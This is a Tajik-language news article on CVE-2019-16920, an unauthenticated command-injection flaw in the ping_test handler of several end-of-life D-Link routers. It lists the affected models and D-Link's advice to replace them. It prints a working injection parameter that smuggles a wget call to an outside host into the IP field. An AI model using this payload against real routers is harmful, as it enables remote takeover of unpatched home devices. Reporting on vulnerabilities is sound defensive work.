Осебпазирии дурдаст дар роутерҳои D-Link

Дар роутерҳои бесими D-Link муайян карда шуд осебпазирии хатарнок (CVE-2019–16920), ки ба шумо имкон медиҳад, ки кодро дар паҳлӯи дастгоҳ тавассути ирсоли дархости махсус ба коркардкунандаи "ping_test", ки бидуни аутентификатсия дастрас аст, иҷро кунед.

Ҷолиб он аст, ки ба гуфтаи таҳиягарони нармафзор, занги "ping_test" бояд танҳо пас аз тасдиқи аутентификатсия иҷро карда шавад, аммо дар асл он дар ҳар сурат, новобаста аз ворид шудан ба интерфейси веб даъват карда мешавад. Аз ҷумла, ҳангоми дастрасӣ ба скрипти apply_sec.cgi ва гузаштани параметри "action=ping_test", скрипт ба саҳифаи аутентификатсия масир мекунад, аммо ҳамзамон амали марбут ба ping_testро иҷро мекунад. Барои иҷро кардани код, осебпазирии дигар дар худи ping_test истифода шуд, ки бе дурустии дурустии суроғаи IP-и барои санҷиш фиристодашуда утилитаи ping-ро даъват мекунад. Масалан, барои занг задан ба утилитаи wget ва интиқол додани натиҷаҳои фармони "echo 1234" ба ҳости беруна, танҳо параметри "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" -ро муайян кунед. test.test/?$( echo 1234)".

Осебпазирии дурдаст дар роутерҳои D-Link

Мавҷудияти осебпазирӣ дар моделҳои зерин расман тасдиқ карда шудааст:

  • DIR-655 бо нармафзори 3.02b05 ё калонтар;
  • DIR-866L бо нармафзори 1.03b04 ё калонтар;
  • DIR-1565 бо нармафзори 1.01 ё калонтар;
  • DIR-652 (маълумот дар бораи версияҳои нармафзори мушкилӣ дода нашудааст)

Мӯҳлати дастгирӣ барои ин моделҳо аллакай гузаштааст, бинобар ин D-Link гуфт, ки барои бартараф кардани осебпазирӣ навсозиҳо нашр намекунад, истифодаи онҳоро тавсия намедиҳад ва тавсия медиҳад, ки онҳоро бо дастгоҳҳои нав иваз кунед. Ҳамчун як роҳи ҳалли амният, шумо метавонед дастрасӣ ба интерфейси вебро танҳо ба суроғаҳои IP боэътимод маҳдуд кунед.

Баъдтар маълум шуд, ки осебпазирӣ низ буд таъсир мерасонад моделҳои DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ва DIR-825, нақшаҳои баровардани навсозиҳои онҳо ҳанӯз маълум нест.

Манбаъ: opennet.ru

Илова Эзоҳ